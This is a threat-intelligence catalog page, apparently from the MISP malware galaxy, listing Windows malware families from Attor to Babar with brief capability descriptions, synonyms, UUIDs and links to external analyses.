Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.
Attor's core lies in its dispatcher, which serves as a management unit for additional plugins that provide all of the malware's key capabilities. This allows the attackers to customize the platform on a per-victim basis. The plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability.
The most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing the victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.
Internal MISP references
UUID f5f61bc0-aad2-4da3-83db-703ea516c03b
which can be used as unique global reference for Attor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.attor - webarchive
- https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html - webarchive
- https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf - webarchive
- https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform/ - webarchive
- https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html - webarchive
- https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform - webarchive
- https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/ - webarchive
- https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
August Stealer
Internal MISP references
UUID 2ee0122a-701d-487d-9ac1-7d91e4f99d78
which can be used as unique global reference for August Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AuKill
According to Sophos, the AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AuKill.
Known Synonyms |
---|
SophosKill |
Internal MISP references
UUID 07bd266b-811a-4abe-83b3-471918d6fab4
which can be used as unique global reference for AuKill
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Auriga
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Auriga.
Known Synonyms |
---|
Riodrv |
Internal MISP references
UUID e3065e43-503b-4496-921b-7601dd3d6abd
which can be used as unique global reference for Auriga
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Aurora
Ransomware
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Aurora.
Known Synonyms |
---|
OneKeyLocker |
Internal MISP references
UUID 2f899e3e-1a46-43ea-8e68-140603ce943d
which can be used as unique global reference for Aurora
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora - webarchive
- https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/ - webarchive
- https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.morphisec.com/in2al5d-p3in4er - webarchive
- https://twitter.com/malwrhunterteam/status/1001461507513880576 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Aurora Stealer
First advertised as a Malware-as-a-Service (MaaS) on Russian-speaking underground forums in April 2022, Aurora Stealer is a Golang-based information stealer with downloading and remote access capabilities. The malware targets data from multiple browsers, cryptocurrency wallets and local systems, and acts as a loader. During execution, the malware runs several commands through WMIC to collect basic host information, takes a desktop screenshot, and exfiltrates data to the C2 server within a single base64-encoded JSON file.
Internal MISP references
UUID ac697773-7239-4f01-b4b3-7da8b2a64bdf
which can be used as unique global reference for Aurora Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora_stealer - webarchive
- https://research.loginsoft.com/threat-research/aurora-the-dark-dawn-and-its-menacing-effects/ - webarchive
- https://d01a.github.io/aurora-stealer-builder/ - webarchive
- https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://isc.sans.edu/diary/rss/29448 - webarchive
- https://research.openanalysis.net/in2al5dp3in4er/loader/analysis/sandbox/invalid%20printer/2023/04/23/in2al5dp3in4er.html - webarchive
- https://d01a.github.io/aurora-stealer/ - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-aurora-stealer - webarchive
- https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/ - webarchive
- https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Avaddon
Avaddon is ransomware targeting Windows systems, often spread via malicious spam. The first known attack in which Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a Tor payment site for the ransom payment.
Internal MISP references
UUID 8f648193-68ca-40c2-98b2-e5481487463e
which can be used as unique global reference for Avaddon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/ - webarchive
- https://www.tgsoft.it/files/report/download.asp?id=568531345 - webarchive
- https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://www.connectwise.com/resources/avaddon-profile - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/ - webarchive
- https://atos.net/en/lp/securitydive/avaddon-ransomware-analysis - webarchive
- https://arxiv.org/pdf/2102.04796.pdf - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf - webarchive
- https://www.swascan.com/it/avaddon-ransomware/ - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire - webarchive
- https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/ - webarchive
- https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/ - webarchive
- https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/ - webarchive
- https://www.mandiant.com/resources/chasing-avaddon-ransomware - webarchive
- https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/ - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1 - webarchive
- https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/ - webarchive
- https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf - webarchive
- https://twitter.com/dk_samper/status/1348560784285167617 - webarchive
- https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html - webarchive
- https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4 - webarchive
- https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/ - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/ - webarchive
- https://twitter.com/Securityinbits/status/1271065316903120902 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AvastDisabler
Internal MISP references
UUID 96a695de-2560-4f10-bbd6-3bc2ac27b7f7
which can be used as unique global reference for AvastDisabler
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AVCrypt
Bleeping Computer reported the discovery of AVCrypt, malware that tries to uninstall existing security software before it encrypts a computer. Furthermore, since it removes numerous services, including Windows Update, and provides no contact information, this ransomware may in fact be a wiper.
Internal MISP references
UUID 0568fcc6-755f-416e-9c5b-22232cd7ae0e
which can be used as unique global reference for AVCrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AvD Crypto Stealer
Cyble Research discovered this .NET malware, dubbed "AvD Crypto Stealer". The name is misleading, because it is actually a kind of clipper malware. Cyble's assumption is that one scenario for this malware is targeting other threat actors.
Internal MISP references
UUID de92fff8-337e-4cf8-853b-f13f08ffc24d
which can be used as unique global reference for AvD Crypto Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Aveo
Internal MISP references
UUID 606b160a-5180-4255-a1db-b2b9e8a52e95
which can be used as unique global reference for Aveo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ave Maria
Information stealer which uses AutoIT for wrapping.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ave Maria.
Known Synonyms |
---|
AVE_MARIA |
AveMariaRAT |
Warzone RAT |
WarzoneRAT |
avemaria |
Internal MISP references
UUID 6bae792a-c2d0-42eb-b9e0-6ef1d83f9b25
which can be used as unique global reference for Ave Maria
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria - webarchive
- https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/ - webarchive
- https://blogs.blackberry.com/en/2021/12/threat-thursday-warzone-rat-breeds-a-litter-of-scriptkiddies - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf - webarchive
- https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html - webarchive
- https://reaqta.com/2019/04/ave_maria-malware-part1/ - webarchive
- https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1 - webarchive
- https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware - webarchive
- https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html - webarchive
- https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/ - webarchive
- https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html - webarchive
- https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://kienmanowar.wordpress.com/2023/03/25/quicknote-decrypting-the-c2-configuration-of-warzone-rat/ - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw - webarchive
- https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://www.youtube.com/watch?v=81fdvmGmRvM - webarchive
- https://muha2xmad.github.io/malware-analysis/warzonerat/ - webarchive
- https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html - webarchive
- https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf - webarchive
- http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery - webarchive
- https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat - webarchive
- https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/fbi-seizes-warzone-rat-infrastructure-arrests-malware-vendor/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://blog.morphisec.com/syk-crypter-discord - webarchive
- https://www.youtube.com/watch?v=T0tdj1WDioM - webarchive
- https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a - webarchive
- https://blog.yoroi.company/research/the-ave_maria-malware/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.justice.gov/opa/pr/international-cybercrime-malware-service-dismantled-federal-authorities-key-malware-sales - webarchive
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/ - webarchive
- https://blog.talosintelligence.com/attributing-yorotrooper/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique - webarchive
- https://www.youtube.com/watch?v=-G82xh9m4hc - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt - webarchive
- https://blog.cyber5w.com/analyzing-macro-enabled-office-documents - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest - webarchive
- https://www.huntress.com/blog/ave-maria-and-the-chambers-of-warzone-rat - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ - webarchive
- https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/ - webarchive
- https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing - webarchive
- https://exploitreversing.files.wordpress.com/2022/11/mas_6-1.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/ - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/international-cybercrime-malware-service-targeting-thousands-of-unsuspecting-consumers-dismantled - webarchive
- https://asec.ahnlab.com/en/36629/ - webarchive
- https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/warzonerat/warzonerat_config_extraction.ipynb - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AvosLocker
AvosLocker is a ransomware-as-a-service (RaaS) gang that first appeared in mid-2021. It has since become notorious for its attacks targeting critical infrastructure in the United States, including the sectors of financial services, critical manufacturing, and government facilities.
In March 2022, the FBI and US Treasury Department issued a warning about the attacks.
Internal MISP references
UUID 8cee7a73-df5f-4ca3-ac52-b8a29a9b7414
which can be used as unique global reference for AvosLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker - webarchive
- https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/ - webarchive
- https://unit42.paloaltonetworks.com/emerging-ransomware-groups/ - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux - webarchive
- https://news.sophos.com/en-us/2021/12/22/avos-locker-remotely-accesses-boxes-even-running-in-safe-mode/ - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - webarchive
- https://www.ic3.gov/Media/News/2022/220318.pdf - webarchive
- https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/ - webarchive
- https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker - webarchive
- https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html - webarchive
- https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 061 (Windows)
Was previously wrongly tagged as PoweliksDropper, now looking for additional context.
Internal MISP references
UUID 969d1054-b917-4fb8-b3f8-1e33926fdb65
which can be used as unique global reference for Unidentified 061 (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Avzhan
Internal MISP references
UUID b12d9354-f67b-47dd-944c-82cfdff7b9a3
which can be used as unique global reference for Avzhan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AXLocker
Internal MISP references
UUID 017ea8db-6eb4-4df1-bac0-da908d2aea9f
which can be used as unique global reference for AXLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ayegent
Internal MISP references
UUID c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70
which can be used as unique global reference for Ayegent
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Aytoke
Keylogger.
Internal MISP references
UUID 91524400-097c-4584-9168-05b317d57b63
which can be used as unique global reference for Aytoke
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Azorult
AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Azorult.
Known Synonyms |
---|
PuffStealer |
Rultazo |
Internal MISP references
UUID 0dfbe48e-a3da-4265-975e-1eb37ad9c51c
which can be used as unique global reference for Azorult
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult - webarchive
- https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html - webarchive
- https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/ - webarchive
- https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf - webarchive
- https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan - webarchive
- https://medium.com/s2wlab/operation-synctrek-e5013df8d167 - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware - webarchive
- https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/ - webarchive
- https://community.riskiq.com/article/56e28880 - webarchive
- https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update - webarchive
- https://unit42.paloaltonetworks.com/cybersquatting/ - webarchive
- https://isc.sans.edu/diary/25120 - webarchive
- https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/ - webarchive
- https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/ - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware - webarchive
- https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/ - webarchive
- https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html - webarchive
- https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/ - webarchive
- https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign - webarchive
- https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/ - webarchive
- https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/ - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672 - webarchive
- https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/ - webarchive
- https://www.youtube.com/watch?v=EyDiIAt__dI - webarchive
- https://twitter.com/DrStache_/status/1227662001247268864 - webarchive
- https://ke-la.com/information-stealers-a-new-landscape/ - webarchive
- https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf - webarchive
- https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html - webarchive
- https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html - webarchive
- https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside - webarchive
- https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/ - webarchive
- https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors - webarchive
- https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d - webarchive
- https://asec.ahnlab.com/en/26517/ - webarchive
- https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/ - webarchive
- https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/ - webarchive
- https://www.splunk.com/en_us/blog/security/-applocker-rules-as-defense-evasion-complete-analysis.html - webarchive
- https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/ - webarchive
- https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ - webarchive
- https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat - webarchive
- https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/ - webarchive
- https://securelist.com/azorult-analysis-history/89922/ - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/ - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html - webarchive
- https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/ - webarchive
- https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/ - webarchive
- https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/ - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/ - webarchive
- https://any.run/cybersecurity-blog/azorult-malware-analysis/ - webarchive
- https://community.riskiq.com/article/2a36a7d2/description - webarchive
- https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://fr3d.hk/blog/gazorp-thieving-from-thieves - webarchive
- https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/ - webarchive
- https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05 - webarchive
- http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Azov Wiper
According to Check Point, this malware is a wiper rather than the ransomware it announces itself as. It is hand-written in FASM and unrecoverably overwrites data in blocks of 666 bytes, using multi-threading.
Internal MISP references
UUID db8dee2a-938e-46af-b2e3-ef5d6e626da7
which can be used as unique global reference for Azov Wiper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper - webarchive
- https://research.checkpoint.com/2022/pulling-the-curtains-on-azov-ransomware-not-a-skidsware-but-polymorphic-wiper/ - webarchive
- https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper - webarchive
- https://twitter.com/CPResearch/status/1587837524604465153 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Babadeda
According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers’ analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.
Internal MISP references
UUID fcb369e1-0783-4188-8841-936c6976035f
which can be used as unique global reference for Babadeda
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Babar
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Babar.
Known Synonyms |
---|
SNOWBALL |
Internal MISP references
UUID 947dffa1-0184-48d4-998e-1899ad97e93e
which can be used as unique global reference for Babar
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.babar - webarchive
- http://www.spiegel.de/media/media-35683.pdf - webarchive
- https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/ - webarchive
- https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/ - webarchive
- https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope - webarchive
- https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Babuk (Windows)
